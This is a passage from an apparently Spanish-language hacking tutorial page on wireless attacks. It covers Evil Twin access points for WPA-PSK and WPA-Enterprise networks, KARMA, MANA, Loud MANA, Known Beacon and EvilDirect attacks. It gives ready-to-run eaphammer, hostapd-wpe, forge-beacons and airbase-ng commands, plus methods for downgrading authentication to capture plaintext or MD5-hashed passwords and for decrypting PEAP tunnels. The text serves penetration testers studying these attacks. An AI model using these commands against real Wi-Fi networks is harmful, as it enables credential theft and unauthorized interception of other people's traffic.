O utilizando Airgeddon: Opciones: 5,6,7,8,9 (dentro del menú de ataque Evil Twin).

Por favor, ten en cuenta que por defecto si un ESSID en la PNL está guardado como protegido con WPA, el dispositivo no se conectará automáticamente a un Evil Twin abierto. Puedes intentar hacer DoS al AP real y esperar que el usuario se conecte manualmente a tu Evil Twin abierto, o podrías hacer DoS al AP real y usar un WPA Evil Twin para capturar el handshake (usando este método no podrás permitir que la víctima se conecte a ti ya que no conoces el PSK, pero puedes capturar el handshake e intentar descifrarlo).

Algunos sistemas operativos y antivirus advertirán al usuario que conectarse a una red abierta es peligroso...

WPA/WPA2 Evil Twin

Puedes crear un Evil Twin usando WPA/2 y si los dispositivos están configurados para conectarse a ese SSID con WPA/2, intentarán conectarse. De todos modos, para completar el 4-way-handshake también necesitas conocer la contraseña que el cliente va a usar. Si no la conoces, la conexión no se completará.

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

Enterprise Evil Twin

Para entender estos ataques, recomendaría leer primero la breve explicación de WPA Enterprise.

Usando hostapd-wpe

hostapd-wpe necesita un archivo de configuración para funcionar. Para automatizar la generación de estas configuraciones podrías usar https://github.com/WJDigby/apd_launchpad (descarga el archivo python dentro de /etc/hostapd-wpe/)

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

En el archivo de configuración puedes seleccionar muchas cosas diferentes como ssid, canal, archivos de usuario, cret/key, parámetros dh, versión wpa y autenticación...

Usando hostapd-wpe con EAP-TLS para permitir que cualquier certificado inicie sesión.

Usando EAPHammer

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

Por defecto, EAPHammer utiliza estos métodos de autenticación (observe GTC como el primero en intentar obtener contraseñas en texto plano y luego el uso de métodos de autenticación más robustos):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

Esta es la metodología predeterminada para evitar tiempos de conexión prolongados. Sin embargo, también puedes especificar al servidor los métodos de autenticación de más débil a más fuerte:

--negotiate weakest

O también podrías usar:

  • --negotiate gtc-downgrade para usar la implementación de degradación GTC altamente eficiente (contraseñas en texto plano)
  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP para especificar manualmente los métodos ofrecidos (ofreciendo los mismos métodos de autenticación en el mismo orden que la organización el ataque será mucho más difícil de detectar).
  • Encuentra más información en la wiki

Usando Airgeddon

Airgeddon puede usar certificados previamente generados para ofrecer autenticación EAP a redes WPA/WPA2-Enterprise. La red falsa degradará el protocolo de conexión a EAP-MD5 para poder capturar el usuario y el MD5 de la contraseña. Luego, el atacante puede intentar descifrar la contraseña.
Airggedon te ofrece la posibilidad de un ataque Evil Twin continuo (ruidoso) o solo crear el ataque Evil Twin hasta que alguien se conecte (suave).

Depuración de túneles TLS PEAP y EAP-TTLS en ataques Evil Twins

Este método fue probado en una conexión PEAP pero como estoy descifrando un túnel TLS arbitrario esto también debería funcionar con EAP-TTLS

Dentro de la configuración de hostapd-wpe comenta la línea que contiene dh_file (de dh_file=/etc/hostapd-wpe/certs/dh a #dh_file=/etc/hostapd-wpe/certs/dh)
Esto hará que hostapd-wpe intercambie claves usando RSA en lugar de DH, para que puedas descifrar el tráfico más tarde conociendo la clave privada del servidor.

Ahora inicia el Evil Twin usando hostapd-wpe con esa configuración modificada como de costumbre. Además, inicia wireshark en la interfaz que está realizando el ataque Evil Twin.

Ahora o más tarde (cuando ya hayas capturado algunos intentos de autenticación) puedes agregar la clave privada RSA a wireshark en: Editar --> Preferencias --> Protocolos --> TLS --> (lista de claves RSA) Editar...

Agrega una nueva entrada y completa el formulario con estos valores: Dirección IP = cualquier -- Puerto = 0 -- Protocolo = data -- Archivo de clave (selecciona tu archivo de clave, para evitar problemas selecciona un archivo de clave sin protección por contraseña).

Y mira la nueva pestaña "TLS descifrado":

KARMA, MANA, Loud MANA y ataque de balizas conocidas

Listas negras/blancas de ESSID y MAC

La siguiente tabla enumera los diferentes tipos de MFACLs (Listas de Control de Acceso de Tramas de Gestión) disponibles, así como sus efectos cuando se utilizan:

# example EAPHammer MFACL file, wildcards can be used
78:f0:97:fc:b5:36
9a:35:e1:01:4f:cf
69:19:14:60:20:45
ce:52:b8:*:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
apples
oranges
grapes
pears

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

Los ataques KARMA son una segunda forma de ataque de punto de acceso falso que explota el proceso de selección de red utilizado por las estaciones. En un documento técnico escrito en 2005, Dino Dai Zovi y Shane Macaulay describen cómo un atacante puede configurar un punto de acceso para escuchar solicitudes de sondeo dirigidas y responder a todas ellas con respuestas de sondeo dirigidas coincidentes. Esto provoca que las estaciones afectadas envíen automáticamente una solicitud de asociación al punto de acceso del atacante. El punto de acceso luego responde con una respuesta de asociación, provocando que las estaciones afectadas se conecten al punto de acceso del atacante.

MANA

Según Ian de Villiers y Dominic White, las estaciones modernas están diseñadas para protegerse contra ataques KARMA ignorando las respuestas de sondeo dirigidas de puntos de acceso que no hayan respondido al menos a una solicitud de sondeo de difusión. Esto llevó a una disminución significativa en el número de estaciones que eran vulnerables a ataques KARMA hasta 2015, cuando White y de Villiers desarrollaron un medio para eludir dichas protecciones. En el ataque KARMA mejorado de White y de Villiers (ataque MANA), se utilizan respuestas de sondeo dirigidas para reconstruir las PNL de las estaciones cercanas. Cuando se recibe una solicitud de sondeo de difusión de una estación, el punto de acceso del atacante responde con un SSID arbitrario de la PNL de la estación que ya se vio en un sondeo directo de ese dispositivo.

En resumen, el algoritmo MANA funciona así: cada vez que el punto de acceso recibe una solicitud de sondeo, primero determina si es una solicitud de sondeo de difusión o dirigida. Si es dirigida, la dirección MAC del remitente se agrega a la tabla hash (si aún no está allí) y el ESSID se agrega a la PNL de ese dispositivo. El AP luego responde con una respuesta de sondeo dirigida. Si es una solicitud de sondeo de difusión, el punto de acceso responde con respuestas de sondeo para cada una de las redes en la PNL de ese dispositivo.

Ataque MANA utilizando eaphammer:

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

Tenga en cuenta que el ataque MANA estándar aún no nos permite atacar dispositivos que no utilizan sondeo dirigido en absoluto. Entonces, si tampoco conocemos previamente ninguna entrada dentro de la PNL del dispositivo, necesitamos encontrar alguna otra forma de atacarlo.

Una posibilidad es lo que se llama ataque Loud MANA. Este ataque se basa en la idea de que los dispositivos cliente que se encuentran en proximidad física cercana entre sí probablemente tengan al menos algunas entradas comunes en sus PNLs.

En resumen, el ataque Loud MANA en lugar de responder a las solicitudes de sondeo con cada ESSID en la PNL de un dispositivo en particular, el AP malicioso envía respuestas de sondeo para cada ESSID en todas las PNLs de todos los dispositivos que ha visto antes. Relacionando esto con la teoría de conjuntos, podemos decir que el AP envía respuestas de sondeo para cada ESSID en la unión de todas las PNLs de los dispositivos cercanos.

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

Ataque Known Beacon

Aún hay casos en los que el ataque Loud MANA no tendrá éxito.
El ataque Known Beacon es una forma de "Fuerza Bruta" para intentar que la víctima se conecte con el atacante. El atacante crea un AP que responde a cualquier ESSID y ejecuta código enviando beacons que fingen ESSIDs de cada nombre dentro de una lista de palabras. Con suerte, la víctima contendrá algunos de estos nombres de ESSID dentro de su PNL e intentará conectarse al AP falso.
Eaphammer implementó este ataque como un ataque MANA donde todos los ESSIDs dentro de una lista se cargan (también podrías combinar esto con --loud para crear un ataque Loud MANA + Known beacons):

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

Ataque Known Beacon Burst

Como es sabido, los beacons son ruidosos. Puedes usar un script dentro del proyecto Eaphammer para lanzar beacons de cada nombre de ESSID dentro de un archivo muy rápidamente. Si combinas este script con un ataque MANA de Eaphammer, los clientes podrán conectarse a tu AP.

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5

Wi-Fi Direct

Wi-Fi Direct es un estándar de Wi-Fi que permite a los dispositivos conectarse entre sí sin un AP inalámbrico, ya que uno de los dos dispositivos actuará como AP (llamado propietario del grupo). Puedes encontrar Wi-Fi Direct en muchos dispositivos IoT como impresoras, televisores...

Wi-Fi Direct depende de Wi-Fi Protected Setup (WPS) para conectar los dispositivos de manera segura. WPS tiene múltiples métodos de configuración como Configuración de Push-Button (PBC), entrada de PIN y Comunicación de Campo Cercano (NFC)

Por lo tanto, los ataques previamente vistos a WPS PIN también son válidos aquí si se utiliza PIN.

Secuestro de EvilDirect

Esto funciona como un Evil-Twin pero para Wi-Fi direct, puedes suplantar a un propietario de grupo para intentar que otros dispositivos como teléfonos se conecten a ti: airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0

Referencias

TODO: Echa un vistazo a https://github.com/wifiphisher/wifiphisher (login con facebook e imitación de WPA en captive portals)

Únete al servidor de HackenProof Discord para comunicarte con hackers experimentados y cazadores de recompensas por errores.

Hacking Insights
Interactúa con contenido que profundiza en la emoción y los desafíos del hacking.

Real-Time Hack News
Mantente al día con el mundo del hacking a través de noticias e insights en tiempo real.

Últimos Anuncios
Mantente informado con los lanzamientos de nuevas recompensas por errores y actualizaciones cruciales de la plataforma.

Únete a nosotros en Discord y comienza a colaborar con los mejores hackers hoy mismo.

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: